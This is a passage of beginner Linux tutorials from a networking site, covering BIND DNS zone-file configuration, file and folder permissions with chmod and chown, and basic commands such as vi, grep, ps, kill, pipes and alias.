Starting from the top, the options section simply defines the directory where all the files to follow are located, the rest are simply comments.

The root servers section tells the DNS server where to find the root hints file, which contains all the root servers.

Next up is the entry for our domain firewall.cx, we let the DNS server know which file contains all the zone entries for this domain and let it know that it will act as a master DNS server for the domain. The same applies for the entry to follow, which contains the IP to Name mappings, this is the 0.168.192.in-addr.arpa zone.

The last entry is required for the local loopback. We tell the DNS server which file contains the local loopback entries.

Notice the "IN" class that is present in each section? If we accidentally forget to include it in our zone files, it wouldn't matter because the DNS server will automatically figure out the class from our named.conf file. It's imperative not to forget the "IN" (Internet) class in the named.conf, whereas it really doesnt matter if you don't put it in the zone files. It's good practice still to enter it in the zone files as we did, just to make sure you don't have any problems later on.

And that ends our discussion for the common DNS (BIND) files.  Next up is the configuration of our Linux BIND Slave/Secondary DNS server.

 

 

  • Hits: 30817

Linux BIND DNS - Part 3: Configuring The db.192.168.0 Zone Data File

The db.192.168.0 zone data file is the second file we need to create and configure for our BIND DNS server. As outlined in the DNS-BIND Introduction, this file's purpose is to provide the IP Address -to- name mappings. Note that this file is to be placed on the Master DNS server for our domain.

Constructing The db.192.168.0 File

While we start to construct the file, you will notice many similarities with our previous file. Most resource records have already been covered and explained in our previous articles and therefore we will not repeat on this page.

The first line is our $TTL control statement, followed by the Start Of Authority (SOA) resource record:

$TTL 86400

0.168.192.in-addr.arpa. IN SOA voyager.firewall.cx. admin.firewall.cx. (

                     1 ; Serial
                     3h ; Refresh after 3 hours
                     1h ; Retry after 1 hour
                     1w ; Expire after one week
                     1h ) ; Negative Caching TTL of 1 hour
As you can see, everything above, except the first column of the first line, is identical to the db.firewall.cx file. The "0.168.192.in-addr.arpa" entry is our IP network in reverse order. The trick to figure out your own in-addr.arpa entry is to simply take your network address, reverse it, and add an ".in-addr.arpa." at the end

Name server resource records are next, follwed by the PTR resource record that creates our IP Address-to-name mappings. The syntax is nearly the same as the db.domain file, but keep in mind that we don't enter the full reversed IP Address for the name servers but only the first 3 octets which represent the network they belong to:

; Name Servers defined here
0.168.192.in-addr.arpa. IN NS voyager.firewall.cx.
0.168.192.in-addr.arpa. IN NS gateway.firewall.cx.

; IP Address to Name mappings
1.0.168.192.in-addr.arpa. IN PTR admin.firewall.cx.
5.0.168.192.in-addr.arpa. IN PTR enterprise.firewall.cx.
10.0.168.192.in-addr.arpa. IN PTR gateway.firewall.cx.
15.0.168.192.in-addr.arpa. IN PTR voyager.firewall.cx.

 Time to look at the configuration file with all its entries:

$TTL 86400

0.168.192.in-addr.arpa. IN SOA voyager.firewall.cx. admin.firewall.cx. (

                     1 ; Serial
                     3h ; Refresh after 3 hours
                     1h ; Retry after 1 hour
                     1w ; Expire after one week
                     1h ) ; Negative Caching TTL of 1 hour

; Name Servers defined here
0.168.192.in-addr.arpa. IN NS voyager.firewall.cx.
0.168.192.in-addr.arpa. IN NS gateway.firewall.cx.

; IP Address to Name mappings
1.0.168.192.in-addr.arpa. IN PTR admin.firewall.cx.
5.0.168.192.in-addr.arpa. IN PTR enterprise.firewall.cx.
10.0.168.192.in-addr.arpa. IN PTR gateway.firewall.cx.
15.0.168.192.in-addr.arpa. IN PTR voyager.firewall.cx.

This completes the confgiuration of our db.192.168.0 Zone data file.

Remember the whole purpose of this file is to provide an IP Address-to-name mapping, which is why we do not use the domain name in front of each line, but the reversed IP Address followed by the in-addr.arpa. entry. Next article deals with the Common Files in Linux BIND DNS.

  • Hits: 49360

Linux BIND DNS - Part 2: Configuring db.domain Zone Data File

It's time to start creating our zone files. We'll follow the standard format, which is given in the DNS RFCs, in order to keep everything neat and less confusing.

First step is to decide on the domain we're using and we've decided on the popular firewall.cx. This means that the first zone file will be db.firewall.cx. Note that this file is to be placed on the Master DNS server for our domain.

We will progressively build our database by populating it step by step and explaining each step we take. At the end of the step-by-step example, we'll grab each step's data and put it all together so we can see how the final version of our file will look. We strongly beleive, this is the best method of explaining how to create a zone file without confusing the hell out of everyone!

Constructing db.firewall.cx - db.domain

It is important at this point to make it clear that we are setting up a primary DNS server. For a simple DNS caching or secondary name server, the setup is a lot simpler and covered on the articles to come.

The first entry for our file is the Default TTL - Time To Live. This is defined using the $TTL control statement. $TTL specifies the time to live for all records in the file that follow the statement and don't have an explicit TTL. We are going to set ours to 24 hours - 86400 seconds.

The units used are seconds. An older common TTL value for DNS was 86400 seconds, which is 24 hours. A TTL value of 86400 would mean that, if a DNS record was changed on the authoritative nameserver, DNS servers around the world could still be showing the old value from their cache for up to 24 hours after the change.

Newer DNS methods that are part of a DR (Disaster Recovery) system may have some records deliberately set extremely low on TTL. For example a 300 second TTL would help key records expire in 5 minutes to help ensure these records are flushed world wide quickly. This gives administrators the ability to edit and update records in a timely manner. TTL values are "per record" and setting this value on specific records is normally honored automatically by all standard DNS systems world-wide.   Dynamic DNS (DDNS) usually have the TTL value set to 5 minutes, or 300 seconds.

Next up is the SOA Record. The SOA (Start Of Authority) resource record indicates that this name server is the best source of information for the data within this zone (this record is required in each db.DOMAIN and db.ADDR file), which is the same as saying this name server is Authoritative for this zone. There can be only one SOA record in every data zone file (db.DOMAIN).

$TTL 86400

firewall.cx. IN SOA voyager.firewall.cx. admin.voyager.firewall.cx. (
                            1 ; Serial Number
                            3h ; Refresh after 3 hours
                            1h ; Retry after 1 hour
                            1w ; Expire after 1 week
                            1h ) ; Negative caching TTL of 1 hour

Let's explain the above code:

firewall.cx. is the domain name and must always be stated in the first column of our line, be sure you include the trailing dot "." after the domain name, we'll explain later on why this is needed.

The IN stands for Internet. This is one class of data and while other classes exist, you won't see them at all because they are not used :)

The SOA is an important resource record. What follows is the actual primary name server for firewall.cx. In our example, this is the server named "voyager" and its Fully Qualified Domain Name (FQDN) is voyager.firewall.cx. Notice the trailing "." is present here as well.

Next up is the entry admin.voyager.firewall.cx. which is the email address of the person responsible for this domain. Take the dot "." after the admin entry and replace it with a "@" and you have a valid email address: This email address is being protected from spambots. You need JavaScript enabled to view it.. Most times you will see root, postmaster or hostmaster instead of "admin".

The "(" parentheses allow the SOA record to span more than one line, while in most cases the fields that follow are used by the secondary name servers and any other name server requesting information about the domain.

The serial number "1 ; Serial Number" entry is used by the secondary name server to keep track of changes that might have occured in the master's zone file. When the secondary name server contacts the primary name server, it will check to see if this value is the same. If the secondary's name server is lower than the primary's, then its data is out of date and, when equal, it means the data is up to date. This means when you make any modifications to the primary's zone file, you must increment the serial number at least by one.

Note that anything after the semicolon (;) is considered a remark and not taken into consideration by the DNS BIND Service. This allows us to create easy-to-understand comments for future reference.

The refresh "3h ; Refresh after 3 hours" tells the secondary name server how often to check the primary's server's data, to ensure its copy for this zone is up to date.

If the secondary name server tries to contact the primary and fails, the retry "1 h ; Retry after 1 hour" is used to tell the secondary name server how long to wait until it tries to contact the primary again.

If the secondary name server fails to contact the primary for longer than the time specified in the fourth entry "1 w ; Expire after 1 week", then the zone data on the secondary name server is considered too old and will expire.

The last line "1 h ) ; Negative caching TTL of 1 day" is how long a name server will send negative responses about the zone. These negative responses say that a particular domain or type of data sought for a particular domain name doesn't exist. Notice the SOA section finishes with the ")" parentheses.

Next up in the file are the name server (NS) records:

; Name Servers defined here

firewall.cx. IN NS voyager.firewall.cx.

firewall.cx. IN NS gateway.firewall.cx.

These entries define the two name servers (voyager and gateway) for our domain firewall.cx. These entries will be also in the db.ADDR file for this domain as we will see later on.

It's time to enter our MX records. These records define the mail exchange servers for our domain, and this is how any client, host or email server is able to find a domain's email server:

; Mail Exchange servers defined here

firewall.cx. IN MX 10 voyager.firewall.cx.

firewall.cx. IN MX 20 gateway.firewall.cx.

Let's explain what exactly these entries mean. The first line specifies that voyager.firewall.cx is a mail exchanger for firewall.cx, just as the second line (...IN MX 20 gateway...) specifies that gateway.firewall.cx is also a mail exchanger for the domain. The MX record indicates that the following hosts are mail exchanger servers for the domain and the numbers 10 and 20 indicate the priority level. The smaller the number, the higher the priority.

This means that voyager.firewall.cx is a higher priority mail server than gateway.firewall.cx.  If another server trying to send email to firewall.cx fails to contact the highest priority mail server (voyager.firewall.cx), it will then fall back to the secondary, in which our case is gateway.firewall.cx.

These entries were introduced to prevent mail loops. When another email server (unlikely for a private domain like mine, but the same rule applies for the Internet) wants to send mail to firewall.cx, it will try to contact first the mail exchanger with the smallest number, which in our case is voyager.firewall.cx. The smaller the number, the higher the priority if there are more than one mail servers.

In our example, if we replaced:

firewall.cx. IN MX 10 voyager.firewall.cx.

firewall.cx. IN MX 20 gateway.firewall.cx.

with

firewall.cx. IN MX 50 voyager.firewall.cx.

firewall.cx. IN MX 100 gateway.firewall.cx.

the result in matter of server priority, would be the same.

Let's now have a look our next part of our zone file: Host IP Addresses and Alias records:

; Host addresses defined here

localhost.firewall.cx. IN A 127.0.0.1

voyager.firewall.cx. IN A 192.168.0.15

enterprise.firewall.cx. IN A 192.168.0.5

gateway.firewall.cx. IN A 192.168.0.10

admin.firewall.cx. IN A 192.168.0.1

; Aliases

www.firewall.cx. IN CNAME voyager.firewall.cx.

Most fields in this section are easy to understand. We start by defining our localhost (local loopback) "localhost.firewall.cx. IN A 127.0.0.1" and continue with the servers on our private network, these include voyager, enterprise, gateway and admin. The "A" record stands for IP Address. So "voyager.firewall.cx. IN A 192.168.0.15" translates to a host called voyager located in the firewall.cx domain with an INternet ip Address of 192.168.0.15. See the pattern? :)

The second block has the aliases table, where we created a Canonical Name (CNAME) record. A CNAME record simply maps an alias to its canonical name; in our example, www is the alias and voyager.firewall.cx is the canonical name.

When a name server looks up a name and finds CNAME records, it replaces the name (alias - www) with its canonical name (voyager.firewall.cx) and looks up the canonical name (voyager.firewall.cx).

For example, when a name server looks up www.firewall.cx, it will replace the 'www' with 'voyager' and lookup the IP Address for voyager.firewall.cx.

This also explains the existance of "www" in all URLs - it's nothing more than an alias which, ultimately, is replaced with the CNAME record defined.

The Complete db.domain Configuration File

That completes a simple domain setup! We have now created a working zone file that looks like this:

$TTL 86400

firewall.cx. IN SOA voyager.firewall.cx. admin.voyager.firewall.cx. (
                            1 ; Serial Number
                            3h ; Refresh after 3 hours
                            1h ; Retry after 1 hour
                            1w ; Expire after 1 week
                            1h ) ; Negative caching TTL of 1 hour

; Name Servers defined here

firewall.cx. IN NS voyager.firewall.cx.

firewall.cx. IN NS gateway.firewall.cx.

; Mail Exchange servers defined here

firewall.cx. IN MX 10 voyager.firewall.cx.

firewall.cx. IN MX 20 gateway.firewall.cx.

; Host Addresses Defined Here

localhost.firewall.cx. IN A 127.0.0.1

voyager.firewall.cx. IN A 192.168.0.15

enterprise.firewall.cx. IN A 192.168.0.5

gateway.firewall.cx. IN A 192.168.0.10

admin.firewall.cx. IN A 192.168.0.1

; Aliases

www.firewall.cx. IN CNAME voyager.firewall.cx.

A quick glance at this file tells you a lot about our lab domain firewall.cx, and this is probably the best time to explain why we should not omit the trailing dot at the end of the domain name:

If we took gateway.firewall.cx as an example and omitted the dot "." at the end of our entries, the system would translate it like this: gateway.firewall.cx.firewall.cx - definately not  what we want!

As you see, the 'firewall.cx' is appended to the end of our Fully Qualified Domain Name for the particular resource record (gateway). This is why it's so important to never forget that extra dot "." at the end!

Our next article will cover the db.ADDR file, which will take the name db.192.168.0. for our example.

  • Hits: 45028

Linux BIND DNS - Part 1: Introduction To The DNS Database (BIND)

BIND (Berkely Internet Name Domain) is a popular software for translating domain names into IP addresses and usually found on Linux servers. This article will explain the basic concepts of DNS BIND and analyse the associated files required to successfully setup your own DNS BIND server. After reading this article, you will be able to successfully install and setup a Linux BIND DNS server for your network.

Zones and Domains

The programs that store information about the domain name space are called name servers, as you probably already know. Name Servers generally have complete information about some part of the domain name space (a zone), which they load from a file. The name server is then said to have authority for that zone.

The term zone is not one that you come across every day while you're surfing on the Internet. We tend to think that the domain concept is all there is when it comes to DNS, which makes life easy for us, but when dealing with DNS servers that hold data for our domains (name servers), then we need to introduce the zone term since it is essential so we can understand the setup of a DNS server.

The difference between a zone and a domain is important, but subtle. The best way to understand the difference is by using a good example, which is coming up next.

The COM domain is divided into many zones, including the hp.com zone, sun.com, it.com. At the top of the domain, there is also a com zone.

The diagram below shows you how a zone fits within a domain:

 dns-bind-intro-1

 

The trick to understanding how it works is to remember that a zone exists "inside" a domain. Name servers load zone files, not domains. Zone files contain information about the portion of a domain for which they are responsible. This could be the whole domain (sun.com, it.com) or simply a portion of it (hp.com + pr.hp.com).

In our example, the hp.com domain has two subdomains, support.hp.com and pr.hp.com. The first one, support.hp.com is controlled by its own name servers as it has its own zone, called the support.hp.com zone. The second one though, pr.hp.com is controlled by the same name server that takes care of the hp.com zone.

The hp.com zone has very little information about the support.hp.com zone, it simply knows its right below. If anyone requires more information on support.hp.com, it will be requested to contact the authoritative name servsers for that subdomain, which are the name servers for that zone.

So you see that even though support.hp.com is a subdomain just like pr.hp.com, it is not setup and controlled the same way as pr.hp.com.

On the other hand, the Sun.com domain has one zone (sun.com zone) that contains and controlls the whole domain. This zone is loaded by the authoritative name servers.

BIND? Never Heard of it!

As mentioned in the beginning of this article, BIND stands for Berkely Internet Name Domain. Keeping things simple, it's a program you download (www.bind.org) and install on your Unix or Linux server to give it the ability to become a DNS server for your private (lan) or public (Internet) network.

The majority of DNS servers are based on BIND as it's a proven and reliable DNS server. The download is approximately 4.8 MBytes. Untarring and compiling BIND is a pretty straight forward process and the steps required will depend on your Linux distribution and version. If you follow the instructions provided with the download, you shouldn't have any problems.  For simplicity purposes, we assume you've compiled and installed the BIND program using the provided instructions.

Setting Up Your Zone Data

No matter what Linux distribution you have, the file structure is pretty much the same. I have BIND installed on my Linux server, which runs Slackware v8 with kernel 2.4.19. By following the installation procedure found in the documentation provided with BIND, you will have the server installed within 15 min at most.

Once the installation of BIND is complete you need to start creating your zone data files. Remember, these are the files the DNS server will load in order to understand how your domain is setup and the various hosts within it.

A DNS server has multiple files that contain information about the domain setup. From these files, one will map all host names to IP Addresses and other files will map the IP Address back to hostnames. The name-to-IP Address lookup is sometimes called forward mapping and the IP Address-to-name lookup reverse mapping. Each network will have its own file for reverse-mapping.

As a convention in this section, a file that maps hostnames to IP Addresses will be called db.DOMAIN, where DOMAIN is the name of your domain e.g. db.firewall.cx, and db is short for DataBase.The files mapping IP Address to hostnames are called db.ADDR where ADDR is the network number without trailing zeros or the specification of a netmask, e.g db.192.168.0 for the 192.168.0.0 network.

The collection of our db.DOMAIN and db.ADDR files are our Zone Data files. There are a few other zone data files, some of which are created during the installation of BIND: named.ca, localhost.zone and named.local.

Named.ca contains information about the root servers on the Internet, should your DNS server require to contact one of them. Localhost.zone and Named.local are there to cover the loopback network. The loopback address is a special address hosts use to direct traffic to themselves. This is usually IP Address 127.0.0.1, which belongs to the 127.0.0.0/24 network.

These files must be present in each DNS server and are the same for every DNS server.

Quick Summary of Our Files

Let's have a quick look at the files we have covered so far to make sure we don't lose track:

1) Following files must be created by you and will contain the data for our zone:

  • db.DOMAIN e.g db.space.net - Host to IP Address mapping
  • db.ADDR e.g db.192.168.0 - IP Address to Host mapping

2) Following files are usually created by the BIND installation:

  • named.ca - Contains the ROOT DNS servers
  • named.local & localhost.zone - Special files so the server can direct traffic to itself.

You should also be aware that the file names can change, there is no standard for names, it's just very convenient and tidy to keep some type of convention.

To tie all the zone data files together a name server needs a configuration file. BIND version 8 and above calls it named.conf and it can be found in your /etc dir once you install the BIND package. Named.conf simply tells the name server where your zone files are located and we will be analysing this file later on.

Most entries in the zone data files are called DNS resource records. Since DNS lookups are case insensitive, you can enter names in your zone data files in uppercase, lowercase or mixed case. I tend to use lowercase.

Resource records must start in the first column of a line. The DNS RFCs have samples that present the order in which one should enter the resource records. Some people choose to follow this order, while others don't. You are not required to follow this order, but I do :)

Here is the order of resource records in the zone data file:

SOA record - Indicates authority for this zone.

NS record - Lists a name server for this zone

MX record - Indicates the mail exchange server for the domain

A record - Name to IP Address mapping (gives the IP Address for a host)

CNAME record - Canonical name (used for aliases)

PTR record - Address to name mapping (used in db.ADDR)

The next article (Part 2) deals with the construction of our first zone data file, db.firewall.cx of our example firewall.cx domain.

 

 

  • Hits: 178254

Finding More Information On The Linux Operating System

Since this document merely scratches the surface when it comes to Linux, you will probably find you have lots of questions and possibly problems. Whether these are problems with the operating system, or not knowing the proper way to perform the task in Linux, there is always a place to find help.

On our forums you'll find a lot of experienced people always willing to go that extra mile to help you out, so don't hesitate to ask - you'll be suprised at the responses!

Generally the Linux community is a very helpful one. You'll be happy to know that there is more documentation, tutorials, HOW-TOs and FAQs (Frequently Asked Questions) for Linux than for all other operating systems in the world!

If you go to any search engine, forum or news group researching a problem, you'll always find an answer.

To save you some searching, here are a few websites where you can find information covering most aspects of the operating system:

  • https://tldp.org/ - The Linux Documentation Project homepage has the largest collection of tutorials, HOW-TOs and FAQs for Linux.
  • https://www.linux.org/- The documentation page from the official Linux.org website. Contains links to a lot of useful information.
  • https://forums.justlinux.com/ - Contains a library of information for beginners on all topics from setting up hardware, installing software, to compiling the kernel
  • https://rpm.pbone.net/ - Pbone is a great search engine to find RPM packages for your Linux operating system.
  • https://sourceforge.net/ - The world's largest development and download repository of Open Source code (free) and applications. Sourceforge hosts thousands of open source projects, most of which are of course for the Linux operating system.

We hope you have enjoyed this brief introduction to the Linux operating system and hope you'll be tempted to try Linux for yourself. You've surely got nothing to lose and everything to gain!

Remember, Linux is the No.1 operating system when it comes to web services and mission critical servers - it's not a coincidence other major software vendors are doing everything they can to stop Linux from gaining more ground!

Visit our Linux section to discover more engaging technical articles on the Linux Operating system.

  • Hits: 18182

Linux File & Folder Permissions

File & folder security is a big part of any operating system and Linux is no exception!

These permissions allow you to choose exactly who can access your files and folders, providing an overall enhanced security system. This is one of the major weaknesses in the older Windows operating systems where, by default, all users can see each other's files (Windows 95, 98, Me).

For the more superior versions of the Windows operating system such as NT, 2000, XP and 2003 things look a lot safer as they fully support file & folder permissions, just as Linux has since the beginning.

Together, we'll now examine a directory listing from our Linux lab server, to help us understand the information provided. While a simple 'ls' will give you the file and directory listing within a given directory, adding the flag '-l' will reveal a number of new fields that we are about to take a look at:

linux-introduction-file-permissions-1

It's possible that most Linux users have seen similar information regarding their files and folders and therefore should feel pretty comfortable with it. If on the other hand you happen to fall in to the group of people who haven't seen such information before, then you either work too much in the GUI interface of Linux, or simply haven't had much experience with the operating system :)

Whatever the case, don't disappear - it's easier than you think!!

Understanding "drwx"

Let's start from scratch, analysing the information in the previous screenshot.

linux-introduction-file-permissions-2

In the yellow column on the right we have the file & directory names (dirlist.txt, document1, document2 etc.) - nothing new here. Next, in the green column, we will find the time and date of creation.

Note that the date and time column will not always display in the format shown. If the file or directory it refers to was created in a year different from the current one, it will then show only the date, month and year, discarding the time of creation.

For example, if the file 'dirlist.txt' was created on the 27th of July, 2004, then the system would show:

Jun 27 2004 dirlist.txt

instead of

Jun 27 11:28 dirlist.txt

A small but important note when examining files and folders! Lastly, the date will change when modifying the file. As such, if we edited a file created last year, then the next time we typed 'ls -l', the file's date information would change to today's date. This is a way you can check to see if files have been modified or tampered with.

The next column (purple) contains the file size in bytes - again nothing special here.

linux-introduction-file-permissions-3

Next column (orange) shows the permissions. Every file in Linux is 'owned' by a particular user.. normally this is the user (owner) who created the file.. but you can always give ownership to someone else.

The owner might belong to a particular group, in which case this file is also associated with the user's group. In our example, the left column labeled 'User' refers to the actual user that owns the file, while the right column labeled 'group' refers to the group the file belongs to.

Looking at the file named 'dirlist.txt', we can now understand that it belongs to the user named 'root' and group named 'sys'.

Following the permissions is the column with the cyan border in the listing.

The system identifies files by their inode number, which is the unique file system identifier for the file. A directory is actually a listing of inode numbers with their corresponding filenames. Each filename in a directory is a link to a particular inode.

Links let you give a single file more than one name. Therefore, the numbers indicated in the cyan column specifies the number of links to the file.

As it turns out, a directory is actually just a file containing information about link-to-inode associations.

Next up is a very important column, that's the first one on the left containing the '-rwx----w-' characters. These are the actual permissions set for the particular file or directory we are examining.

To make things easier, we've split the permissions section into a further 4 columns as shown above. The first column indicates whether we are talking about a directory (d), file (-) or link (l).

In the newer Linux distributions, the system will usually present the directory name in colour, helping it to stand out from the rest of the files. In the case of a file, a dash (-) or the letter 'f' is used, while links make the use of the letter 'l' (l). For those unfamiliar with links, consider them something similar to the Windows shortcuts.

linux-introduction-file-permissions-4

Column 2 refers to the user rights. This is the owner of the file, directory or link and these three characters determine what the owner can do with it.

The 3 characters on column 2 are the permissions for the owner (user rights) of the file or directory. The next 3 are permissions for the group that the file is owned by and the final 3 characters define the access permissions for the others group, that is, everyone else not part of the group.

So, there are 3 possible attributes that make up file access permissions:

  • r - Read permission. Whether the file may be read. In the case of a directory, this would mean the ability to list the contents of the directory.
  • w - Write permission. Whether the file may be written to or modified. For a directory, this defines whether you can make any changes to the contents of the directory. If write permission is not set then you will not be able to delete, rename or create a file.
  • x - Execute permission. Whether the file may be executed. In the case of a directory, this attribute decides whether you have permission to enter, run a search through that directory or execute some program from that directory.

Let's take a look at another example:

linux-introduction-file-permissions-5

Take the permissions of 'red-bulb', which are drwxr-x---. The owner of this directory is user david and the group owner of the directory is sys. The first 3 permission attributes are rwx. These permissions allow full read, write and execute access to the directory to user david. So we conclude that david has full access here.

The group permissions are r-x. Notice there is no write permission given here so while members of the group sys can look at the directory and list its contents, they cannot create new files or sub-directories. They also cannot delete any files or make changes to the directory content in any way.

Lastly, no one else has any access because the access attributes for others are - - -.

If we assume the permissions are drw-r--r-- you see that the owner of the directory (david) can list and make changes to its contents (Read and Write access) but, because there is no execute (x) permission, the user is unable to enter it! You must have read and execute (r-x) in order to enter a directory and list its contents. Members of the group sys have a similar problem, where they seem to be able to read (list) the directory's contents but can't enter it because there is no execute (x) permission given!

Lastly, everyone else can also read (list) the directory but is unable to enter it because of the absence of the execute (x) permission.

Here are some more examples focusing on the permissions:

-r--r--r-- :This means that owner, group and everyone else has only read permissions to the file (remember, if there's no 'd' or 'l', then we are talking about a file).

-rw-rw-rw- : This means that the owner, group and everyone else has read and write permissions.

-rwxrwxrwx : Here, the owner, group and everyone else has full permissions, so they can all read, write and execute the file (-).

Modifying Ownership & Permissions

So how do you change permissions or change the owner of a file?

Changing the owner or group owner of a file is very simple, you just type 'chown user:group filename.ext', where 'user' and 'group' are those to whom you want to give ownership of the file. The 'group' parameter is optional, so if you type 'chown david file.txt', you will give ownership of file.txt to the user named david.

In the case of a directory, nothing much changes as the same command is used. However, because directories usually contain files that also need to be assigned to the new user or group, we use the '-R' flag, which stands for 'recursive' - in other words all subdirectories and their files: 'chown -R user:group dirname'.

To change permissions you use the 'chmod' command. The possible options here are 'u' for the user, 'g' for the group, 'o' for other, and 'a' for all three. If you don't specify one of these letters it will change to all by default. After this you specify the permissions to add or remove using '+' or '-' . Let's take a look at an example to make it easier to understand:

If we wanted to add read, write and execute to the user of a particular file, we would type the following 'chmod u+rwx file.txt'. If on the other hand you typed 'chmod g-rw file.txt' you will take away read and write permissions of that file for the group .

While it's not terribly difficult to modify the permissions of a file or directory, remembering all the flags can be hard. Thankfully there's another way, which is less complicated and much faster. By replacing the permissions with numbers, we are able to calculate the required permissions and simply enter the correct sum of various numbers instead of the actual rights.

The way this works is simple. We are aware of three different permissions, Read (r), Write (w) and Execute (x). Each of these permissions is assigned a number as follows:

r (read) - 4

w (write) - 2

x (execute) - 1

Now, to correctly assign a permission, all you need to do is add up the level you want, so if you want someone to have read and write, you get 4+2=6, if you want someone to have just execute, it's just 1.. zero means no permissions. You work out the number for each of the three sections (owner, group and everyone else).

If you want to give read write and execute to the owner and nothing to everyone else, you'd get the number 7 0 0. Starting from the left, the first digit (7) presents the permissions for the owner of the file, the second digit (0) is the permissions for the group, and the last (0) is the permissions for everyone else. You get the 7 by adding read, write and execute permissions according to the numbers assigned to each right as shown in the previous paragraphs: 4+2+1 = 7.

r, w, x Permissions
Calculated Number

---

0
--x
1
-w-
2
-wx
3 (2+1)
r--
4
r-x
5 (4+1)
rw-
6 (4+2)
rwx
7 (4+2+1)


If you want to give full access to the owner, only read and execute to the group, and only execute to everyone else, you'd work it out like this :

owner: rwx = 4 + 2 + 1 = 7

group: r-x = 4 + 0 + 1 = 5

everyone: --x = 0 + 0 + 1 = 1

So your number will be 751, 7 for owner, 5 for group, and 1 for everyone. The command will be 'chmod 751 file.txt'. It's simple isn't it ?

If you want to give full control to everyone using all possible combinations, you'd give them all 'rwx' which equals to the number '7', so the final three digit number would be '777':

linux-introduction-file-permissions-6

If on the other hand you decide not to give anyone any permission, you would use '000' (now nobody can access the file, not even you!). However, you can always change the permissions to give yourself read access, by entering 'chmod 400 file.txt'.

For more details on the 'chmod' command, please take a look at the man pages.

As we will see soon, the correct combination of user and group permissions will allow us to perform our work while keeping our data safe from the rest of the world.

For example in order for a user or group to enter a directory, they must have at least read (r) and execute (x) permissions on the directory, otherwise access to it is denied:

linux-introduction-file-permissions-7

As seen here, user 'mailman' is trying to access the 'red-bulb' directory which belongs to user 'david' and group 'sys'. Mailman is not a member of the 'sys' group and therefore can't access it. At the same time the folder's permissions allow neither the group nor everyone to access it.

Now, what we did is alter the permission so 'everyone' has at least read and execute permissions so they are able to enter the folder - let's check it out:

linux-introduction-file-permissions-8

Here we see the 'mailman' user successfully entering the 'red-bulb' directory because everyone has read (r) and execute (x) access to it!

The world of Linux permissions is pretty user friendly as long as you see from the right perspective :) Practice and reviewing the theory will certainly help you remember the most important information so you can perform your work without much trouble.

If you happen to forget something, you can always re-visit us - any time of the day!

Continuing on to our last page, we will provide you with a few links to some of the world's greatest Linux resources, covering Windows to Linux migration, various troubleshooting techniques, forums and much more that will surely be of help.

This completes our initial discussion on the Linux operating system. Visit our Finding More Information page to discover useful resources that will assist you in your Linux journey or visit our Linux section to access more technical articles on the Linux operating system.

  • Hits: 329064

Advanced Linux Commands

Now that you're done learning some of the Basic Linux commands and how to use them to install Linux Software, it's time we showed you some of the other ways to work with Linux. Bear in mind that each distribution of Linux (Redhat, SUSE, Mandrake etc) will come with a slightly different GUI (Graphical User Interface) and some of them have done a really good job of creating GUI configuration tools so that you never need to type commands at the command line.

Vi Editor

For example, if you want to edit a text file you can easily use one of the powerful GUI tools like Kate, Kwrite etc., which are all like notepad in Windows though much more powerful; they have features such as multiple file editing and syntax highlighting (if you open an HTML file it understands the HTML tags and highlights them for you). However, you can also use the very powerful vi editor.

When first confronted by vi most users are totally lost, you open a file in vi (e.g vi document1) and try to type, but nothing seems to happen.. the system just keeps beeping!

Well that's because vi functions in two modes, one is the command mode, where you can give vi commands such as open a file, exit, split the view, search and replace etc., and the other mode is the insert view where you actually type text!

Don't be put off by the fact that vi doesn't have a pretty GUI interface to go with it, this is an incredibly powerful text editor that would be well worth your time learning... once you're done with it you'll never want to use anything else!


Realising that most people would find vi hard to use straight off, there is a useful little walk-through tutorial that you can access by typing vimtutor at a command line. The tutorial opens vi with the tutorial in it, and you try out each of the commands and shortcuts in vi itself. It's very easy and makes navigating around vi a snap. Check it out.

•Grep

Another very useful Linux command is the grep command. This little baby searches for a string in any file. The grep command is frequently used in combination with other commands in order to search for a specific string. For example, if we wanted to check our web server's log file for a specific URL query or IP address, the 'grep' command would do this job just fine.

If, on the other hand, you want to find every occurence of 'hello world' in every .txt file you have, you would type grep "hello world" *.txt

You'll see some very common command structures later on that utilise 'grep'. At the same time, you can go ahead and check grep's man page by typing man grep , it has a whole lot of very powerful options.

linux-introduction-avd-cmd-line-3

PS - Process ID (PID) display

The ps command will show all the tasks you are currently running on the system, it's the equivalent of Windows Task Manager and you'll be happy to know that there are also GUI versions of 'ps'.

If you're logged in as root in your Linux system and type ps -aux , you'll see all processes running on the system by every user, however, for security purposes, users will only be able to see processes owned by them when typing the same command.

linux-introduction-avd-cmd-line-4

Again, man ps will provide you with a bundle of options available by the command.

•Kill

The 'kill' command is complementary to the 'ps' command as it will allow you to terminate a process revealed with the previous command. In cases where a process is not responding, you would use the following syntax to effectively kill it: kill -9 pid where 'pid' is the Process ID (PID) that 'ps' displays for each task.

linux-introduction-avd-cmd-line-5

In the above example, we ran a utility called 'bandwidth' twice which is shown as two different process IDs (7171 & 13344) using the ps command. We then attempted to kill one of them using the command kill -9 7171 . The next time we ran the 'ps', the system reported that a process that was started with the './bandwidth' command had been previously killed.

Another useful flag we can use with the 'kill' command is the -HUP. This neat flag won't kill the process but pause it and at the same time force it to reload its configuration. So, if you've got a service running and need to restart it because of changes made in its configuration file, then the -HUP flag will do just fine. Many people look at it as an alternative 'reload' command.

The complete syntax to make use of the flag is: kill -HUP pid where 'pid' is the process ID number you can obtain using the 'ps' command, just as we saw in the previous examples.

Chaining Commands, Redirecting Output, Piping

In Linux, you can chain groups of commands together with incredible ease, this is where the true power of the Linux command line exists, you use small tools, each of which does one little task and passes the output on to the next one.

For example, when you run the ps aux command, you might see a whole lot of output that you cannot read in one screen, so you can use the pipe symbol ( | ) to send the output of 'ps' to 'grep' which will search for a string in that output. This is known as 'piping' as it's similar to plumbing where you use a pipe to connect two things together.

linux-introduction-avd-cmd-line-6

Say you want to find the task 'antispam' : you can run ps aux | grep antispam . Ps 'pipes' its output to grep and it then searches for the string, showing you only the line with that text.

If you wanted ps to display one page at a time you can pipe the output of ps to either more or less . The advantage of less is that it allows you to scroll upwards as well. Try this: ps aux | less . Now you can use the cursors to scroll through the output, or use pageup, pagedown.

•Alias

The 'alias' command is very neat, it lets you make a shortcut keyword for another longer command. Say you don't always want to type ps aux | less, you can create an alias for it.. we'll call our alias command 'pl'. So you type  alias pl='ps aux | less' .

Now whenever you type pl , it will actually run ps aux | less - Neat, is'nt it?

linux-introduction-avd-cmd-line-7

 

You can view the aliases that are currently set by typing alias:

linux-introduction-avd-cmd-line-8

As you can see, there are quite a few aliases already listed for the 'root' account we are using. You'll be suprised to know that most Linux distributions automatically create a number of aliases by default - these are there to make your life as easy as possible and can be deleted anytime you wish.

Output Redirection

